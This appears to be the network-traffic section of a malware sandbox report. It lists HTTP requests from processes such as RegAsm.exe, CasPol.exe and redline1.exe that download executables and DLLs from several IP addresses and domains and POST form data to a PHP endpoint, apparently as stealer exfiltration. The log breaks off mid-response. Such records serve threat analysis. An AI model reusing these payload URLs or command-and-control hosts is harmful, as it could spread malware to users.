                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:49 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                  Content-Length: 2046288
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://49.13.229.86/84bad7132df89fd7/softokn3.dll
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /84bad7132df89fd7/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:51 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                  Content-Length: 257872
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
• flag-de
GET http://49.13.229.86/84bad7132df89fd7/vcruntime140.dll
RegAsm.exe
Remote address: 49.13.229.86:80
Request
GET /84bad7132df89fd7/vcruntime140.dll HTTP/1.1
Host: 49.13.229.86
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 11 May 2024 22:38:51 GMT
Content-Type: application/x-msdos-program
Content-Length: 80880
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "13bf0-5e7e950876500"
Accept-Ranges: bytes
• flag-de
POST http://49.13.229.86/c73eed764cc59dcb.php
RegAsm.exe
Remote address: 49.13.229.86:80
Request
POST /c73eed764cc59dcb.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAKKEGCAAECAAAKFBGIE
Host: 49.13.229.86
Content-Length: 947
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 11 May 2024 22:38:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
• flag-de
POST http://49.13.229.86/c73eed764cc59dcb.php
RegAsm.exe
Remote address: 49.13.229.86:80
Request
POST /c73eed764cc59dcb.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KFIIJJJDGCBAAKFIIECG
Host: 49.13.229.86
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 11 May 2024 22:38:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 2408
Connection: keep-alive
Vary: Accept-Encoding
• flag-de
POST http://49.13.229.86/c73eed764cc59dcb.php
RegAsm.exe
Remote address: 49.13.229.86:80
Request
POST /c73eed764cc59dcb.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKK
Host: 49.13.229.86
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 11 May 2024 22:38:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
• flag-de
POST http://49.13.229.86/c73eed764cc59dcb.php
RegAsm.exe
Remote address: 49.13.229.86:80
Request
POST /c73eed764cc59dcb.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FHIDAFHCBAKFCAAKFCFC
Host: 49.13.229.86
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 11 May 2024 22:38:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
• flag-de
POST http://49.13.229.86/c73eed764cc59dcb.php
RegAsm.exe
Remote address: 49.13.229.86:80
Request
POST /c73eed764cc59dcb.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFC
Host: 49.13.229.86
Content-Length: 270
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 11 May 2024 22:38:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
• flag-ru
GET
http://5.42.96.78/files/file300un.exe
axplons.exe
Remote address:
5.42.96.78:80
Request
GET /files/file300un.exe HTTP/1.1
Host: 5.42.96.78
Response
HTTP/1.1 200 OK
Date: Sat, 11 May 2024 22:38:51 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sat, 11 May 2024 21:18:01 GMT
ETag: "1e94309-618342fe7897a"
Accept-Ranges: bytes
Content-Length: 32064265
Content-Type: application/x-msdownload
• flag-au
GET
https://bitbucket.org/qwizzi/tt522222/downloads/FlexPremises.exe
redline1.exe
Remote address:
104.192.141.1:443
Request
GET /qwizzi/tt522222/downloads/FlexPremises.exe HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
Response
HTTP/1.1 302 Found
server: envoy
x-usage-quota-remaining: 998918.457
vary: Accept-Language, Origin
x-usage-request-cost: 1099.40
cache-control: max-age=0, no-cache, no-store, must-revalidate, private
Content-Type: text/html; charset=utf-8
x-b3-traceid: 6072ab2e76c728e4
x-usage-output-ops: 0
x-used-mesh: False
x-dc-location: Micros-3
content-security-policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; base-uri 'self'; object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Sat, 11 May 2024 22:38:57 GMT
x-usage-user-time: 0.028766
x-usage-system-time: 0.004216
location: https://bbuseruploads.s3.amazonaws.com/c238a61a-be46-44a2-84f2-dcbe608a006a/downloads/0c322e92-7ded-485f-8f7e-dcd768dac239/FlexPremises.exe?response-content-disposition=attachment%3B%20filename%3D%22FlexPremises.exe%22&AWSAccessKeyId=ASIA6KOSE3BNO4RKJTEI&Signature=fP4AUrYtuepo7A%2FvRAOkJQsOtrI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEOf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIDvhb6af67Krb7onSxljk0Aqra6ZXY41NU7th6kbhYRSAiEAmDF2SaO3kfBTtVPdXCHBPAq5lTpehQGYTB0J4l%2BA1xsqpwIIUBAAGgw5ODQ1MjUxMDExNDYiDFv9xPFrxdM19ack8yqEAhFcojSQlOF%2FVJvzcxdJBT7ZCnvBG9GNIq3q59d%2FB3xm5oyAnYumlVJ%2BOQHKR49A1ycXhIQBwCz52pGycgJ7p66AD9657Zj67Uz%2F6%2F9ZsqN%2B1hZdZUbSxQBuuJ7smHL0yswNqQfdCEQSwTMACfjmMtN1KE8%2Fo6IDu5D025IaIGF1basMzaL5xVWKk%2B%2FBl9IEeCLnwxIYxToHn7AMMhrrkblHwXlWwPbizegLza%2Fd4fla6TybOoTYPsvM5sHcePV%2Fu3Bc20oOYQQMnlinO6r18KOLi5ml4rZhhHiIQ3scew%2FHwbSJQJxS97n2Ert%2FUabD6vZSrug9Vz%2Fyr939%2B7JOksKXnw4WMKLh%2F7EGOp0BVIiB57FBNYWmI79hCIqoFho13KaTQm1SrlHd75jbvQY674dZYOj4%2BseJH0Bht3MvbcdE9W4ArD06tLMX8ttWLr5x4zfNzVJBexdZFqvHbO6tKkF8hWHbdb91QPThvlpnmfJhIHRLwfza6BvjDwVVZXbvXAjvuHhUoeGshdv8tTE6U5uD7zZP8M8dFbI%2FqVJveNoiSqAqGw5lfMDI0Q%3D%3D&Expires=1715468202
expires: Sat, 11 May 2024 22:38:57 GMT
x-served-by: 17b182b5521a
x-envoy-upstream-service-time: 73
content-language: en
x-view-name: bitbucket.apps.downloads.views.download_file
x-b3-spanid: 6072ab2e76c728e4
x-static-version: 8363323b7c2c
x-render-time: 0.05246257781982422
Connection: keep-alive
x-usage-input-ops: 0
x-version: 8363323b7c2c
x-request-count: 652
x-frame-options: SAMEORIGIN
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
• flag-us
GET
https://bbuseruploads.s3.amazonaws.com/c238a61a-be46-44a2-84f2-dcbe608a006a/downloads/0c322e92-7ded-485f-8f7e-dcd768dac239/FlexPremises.exe?response-content-disposition=attachment%3B%20filename%3D%22FlexPremises.exe%22&AWSAccessKeyId=ASIA6KOSE3BNO4RKJTEI&Signature=fP4AUrYtuepo7A%2FvRAOkJQsOtrI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEOf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIDvhb6af67Krb7onSxljk0Aqra6ZXY41NU7th6kbhYRSAiEAmDF2SaO3kfBTtVPdXCHBPAq5lTpehQGYTB0J4l%2BA1xsqpwIIUBAAGgw5ODQ1MjUxMDExNDYiDFv9xPFrxdM19ack8yqEAhFcojSQlOF%2FVJvzcxdJBT7ZCnvBG9GNIq3q59d%2FB3xm5oyAnYumlVJ%2BOQHKR49A1ycXhIQBwCz52pGycgJ7p66AD9657Zj67Uz%2F6%2F9ZsqN%2B1hZdZUbSxQBuuJ7smHL0yswNqQfdCEQSwTMACfjmMtN1KE8%2Fo6IDu5D025IaIGF1basMzaL5xVWKk%2B%2FBl9IEeCLnwxIYxToHn7AMMhrrkblHwXlWwPbizegLza%2Fd4fla6TybOoTYPsvM5sHcePV%2Fu3Bc20oOYQQMnlinO6r18KOLi5ml4rZhhHiIQ3scew%2FHwbSJQJxS97n2Ert%2FUabD6vZSrug9Vz%2Fyr939%2B7JOksKXnw4WMKLh%2F7EGOp0BVIiB57FBNYWmI79hCIqoFho13KaTQm1SrlHd75jbvQY674dZYOj4%2BseJH0Bht3MvbcdE9W4ArD06tLMX8ttWLr5x4zfNzVJBexdZFqvHbO6tKkF8hWHbdb91QPThvlpnmfJhIHRLwfza6BvjDwVVZXbvXAjvuHhUoeGshdv8tTE6U5uD7zZP8M8dFbI%2FqVJveNoiSqAqGw5lfMDI0Q%3D%3D&Expires=1715468202
redline1.exe
Remote address:
52.216.137.116:443
Request
GET /c238a61a-be46-44a2-84f2-dcbe608a006a/downloads/0c322e92-7ded-485f-8f7e-dcd768dac239/FlexPremises.exe?response-content-disposition=attachment%3B%20filename%3D%22FlexPremises.exe%22&AWSAccessKeyId=ASIA6KOSE3BNO4RKJTEI&Signature=fP4AUrYtuepo7A%2FvRAOkJQsOtrI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEOf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIDvhb6af67Krb7onSxljk0Aqra6ZXY41NU7th6kbhYRSAiEAmDF2SaO3kfBTtVPdXCHBPAq5lTpehQGYTB0J4l%2BA1xsqpwIIUBAAGgw5ODQ1MjUxMDExNDYiDFv9xPFrxdM19ack8yqEAhFcojSQlOF%2FVJvzcxdJBT7ZCnvBG9GNIq3q59d%2FB3xm5oyAnYumlVJ%2BOQHKR49A1ycXhIQBwCz52pGycgJ7p66AD9657Zj67Uz%2F6%2F9ZsqN%2B1hZdZUbSxQBuuJ7smHL0yswNqQfdCEQSwTMACfjmMtN1KE8%2Fo6IDu5D025IaIGF1basMzaL5xVWKk%2B%2FBl9IEeCLnwxIYxToHn7AMMhrrkblHwXlWwPbizegLza%2Fd4fla6TybOoTYPsvM5sHcePV%2Fu3Bc20oOYQQMnlinO6r18KOLi5ml4rZhhHiIQ3scew%2FHwbSJQJxS97n2Ert%2FUabD6vZSrug9Vz%2Fyr939%2B7JOksKXnw4WMKLh%2F7EGOp0BVIiB57FBNYWmI79hCIqoFho13KaTQm1SrlHd75jbvQY674dZYOj4%2BseJH0Bht3MvbcdE9W4ArD06tLMX8ttWLr5x4zfNzVJBexdZFqvHbO6tKkF8hWHbdb91QPThvlpnmfJhIHRLwfza6BvjDwVVZXbvXAjvuHhUoeGshdv8tTE6U5uD7zZP8M8dFbI%2FqVJveNoiSqAqGw5lfMDI0Q%3D%3D&Expires=1715468202 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
x-amz-id-2: BlUtqSJjBh572r0294k8MutvOTjL2gRswK4nmV1zatkUNEJ59K+MopKdjkZXt4p0JpsdF0Y/ktQ=
x-amz-request-id: P1CQGYGXCWW8WB88
Date: Sat, 11 May 2024 22:38:58 GMT
Last-Modified: Sat, 11 May 2024 09:20:16 GMT
ETag: "bdaf0c44377ebc825e98d8e649ca8f4b"
x-amz-server-side-encryption: AES256
x-amz-version-id: wDzb9reThG8HyTtaCPuHdJc.5vrsRSET
Content-Disposition: attachment; filename="FlexPremises.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Server: AmazonS3
Content-Length: 841962
• flag-fi
GET
https://65.109.242.112/
Aviation.pif
Remote address:
65.109.242.112:443
Request
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                  Host: 65.109.242.112
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:30 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-fi
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  65.109.242.112:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST / HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECF
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                  Host: 65.109.242.112
                                                                                                                                                                                                                                                                  Content-Length: 279
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:31 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-fi
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  65.109.242.112:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST / HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGD
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                  Host: 65.109.242.112
                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:32 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-fi
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  65.109.242.112:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST / HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----JJECAAEHCFIEBGCBGHIE
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                  Host: 65.109.242.112
                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:32 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-fi
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  65.109.242.112:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST / HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFB
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                  Host: 65.109.242.112
                                                                                                                                                                                                                                                                  Content-Length: 332
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:33 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  https://pastebin.com/raw/E0rY26ni
                                                                                                                                                                                                                                                                  CasPol.exe
Remote address: 104.20.3.235:443
Request
GET /raw/E0rY26ni HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Sat, 11 May 2024 22:39:55 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 789
Last-Modified: Sat, 11 May 2024 22:26:46 GMT
Server: cloudflare
CF-RAY: 8825aaf14ec906bd-LHR

• flag-us
GET https://yip.su/RNWPd.exe
CasPol.exe
Remote address: 172.67.169.89:443
Request
GET /RNWPd.exe HTTP/1.1
Host: yip.su
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Sat, 11 May 2024 22:39:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
memory: 0.36199188232421875
expires: Sat, 11 May 2024 22:39:55 +0000
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
Cache-Control: max-age=14400
CF-Cache-Status: EXPIRED
Last-Modified: Sat, 11 May 2024 21:07:13 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1oV8x0EkW3Ed3MP%2FME6x9tCC3WidELuDvnzIGyu2E5Wyz9DLIEaTcw%2BA6KakUY7iGdIN2zk0YZgi5mTAM%2BZYD%2BQAPPlNCw2E4be5%2BvDto75yWJUZ6o0nE%2Bs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8825aaf14ecedcf7-LHR
alt-svc: h3=":443"; ma=86400

• flag-de
GET http://185.172.128.59/ISetup5.exe
CasPol.exe
Remote address: 185.172.128.59:80
Request
GET /ISetup5.exe HTTP/1.1
Host: 185.172.128.59
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Sat, 11 May 2024 22:39:55 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sat, 11 May 2024 22:30:01 GMT
ETag: "60a01-6183531693d63"
Accept-Ranges: bytes
Content-Length: 395777
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program

• flag-ru
GET http://5.42.96.64/server/ww12/AppGate2103v01.exe
CasPol.exe
Remote address: 5.42.96.64:80
Request
GET /server/ww12/AppGate2103v01.exe HTTP/1.1
Host: 5.42.96.64
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sat, 11 May 2024 22:39:55 GMT
Content-Type: application/octet-stream
Content-Length: 1449760
Last-Modified: Fri, 10 May 2024 14:30:10 GMT
Connection: keep-alive
ETag: "663e2f72-161f20"
Accept-Ranges: bytes

• flag-ru
GET http://5.42.96.78/files/setup.exe
CasPol.exe
Remote address: 5.42.96.78:80
Request
GET /files/setup.exe HTTP/1.1
Host: 5.42.96.78
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Sat, 11 May 2024 22:39:55 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Fri, 10 May 2024 08:32:14 GMT
ETag: "63fa73-618155f6aed8b"
Accept-Ranges: bytes
Content-Length: 6552179
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload

• flag-us
GET https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe
CasPol.exe
Remote address: 172.67.182.192:443
Request
GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: onlycitylink.com
Connection: Keep-Alive
Response
HTTP/1.1 307 Temporary Redirect
Date: Sat, 11 May 2024 22:39:55 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
                                                                                                                                                                                                                                                                  Location: https://firstfirecar.com/c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HhtuYMfjby2uLSnYSqnNNQzTvTbustcnjpNabthnIuOulO%2F%2FyaZ8UAMdUtxM2kAL9u3QH0DeD5CRuLIjvhMn7PgtTZ6%2BrDn26jIBdAmTodpnTRnbzf7qtgdAJj5XY56r7402"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8825aaf24e447765-LHR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  104.21.90.14:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: realdeepai.org
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:55 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Location: https://jonathantwo.com/c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nWzd62fQ7X7uxVE5909qji6aevdqgCsFgDbgtlTd2I2D%2BmPvrQ2%2BFfmgVTdApBDqvld6WWrdW9xHbrZRG%2FUuEiIq786KeknRRsL5wp6PgvghYT%2FMdo%2BR0N6IweZIwrmXvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8825aaf249f006d5-LHR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  172.67.182.192:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: onlycitylink.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:55 GMT
